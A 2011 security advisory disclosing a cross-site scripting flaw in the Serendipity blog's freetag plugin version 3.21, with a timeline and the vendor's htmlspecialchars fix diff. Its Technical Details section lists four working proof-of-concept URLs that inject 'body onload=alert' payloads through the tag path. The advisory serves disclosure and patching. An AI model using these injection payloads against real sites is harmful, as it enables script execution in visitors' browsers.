Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag" Advisory ID: SSCHADV2011-004 Author: Stefan Schurtz Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21 Vendor URL: http://www.s9y.org Vendor Status: Version 3.22 - Fix possible XSS CVE-ID: - ========================== Vulnerability Description: ========================== This is Cross-Site Scripting vulnerability ================== Technical Details: ================== http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)> http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))> http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)> http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))> ========= Solution: ========= Update to the latest version 3.22 diff serendipity_event_freetag.php < <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $ > <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $ < $propbag->add('version', '3.21'); > $propbag->add('version', '3.22'); < $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag); > $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag)); ==================== Disclosure Timeline: ==================== 30-May-2011 - informed developers 30-May-2011 - Release date of this security advisory 30-May-2011 - Version 3.22 - Fix possible XSS 31-May-2011 - post on BugTraq and Full-disclosure ======== Credits: ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References: =========== http://www.s9y.org http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html http://www.rul3z.de/advisories/SSCHADV2011-004.txt http://ha.ckers.org/xss.html